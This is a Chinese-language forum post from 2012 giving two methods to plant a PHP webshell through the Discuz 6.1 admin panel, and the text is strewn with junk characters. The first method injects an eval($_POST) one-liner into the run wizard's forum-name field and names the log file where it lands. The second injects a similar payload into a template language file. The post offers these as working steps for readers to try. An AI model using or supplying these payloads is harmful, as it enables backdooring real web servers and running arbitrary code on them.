discuz6.1两种方法后台拿shell/ [9 x( ^- W% \
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下' z# s' _ ~2 c
1: U' c& ^0 F7 N! T. b
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
/ Y1 J. |$ D3 I" }2 U6 Kadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
4 T2 P8 l( ^. {<?php eval($_POST[cmd]);?>
7 [9 L5 V! O: S4 j1 u0 V后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php, m2 G0 Z7 |0 W/ z( W3 X; U
( D( m' F# A3 j% L% v2 }6 z# b
- L0 k" Z% D1 l2 s n) {8 d
2:后台模板管理--默认模板套系--详情
( v' o# V* k! A% y( ?! q9 jtemplates/default/actions.lang.php8 s6 n* o( y0 A! l' e8 w) C9 a
jhackj\\');eval($_POST[cmd])?>;//
7 m& L7 L6 \* y" I$ M5 T2 z6 G8 D
& g& R" ~2 V7 V& ^5 o5 e; K; I& S* `/ \利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对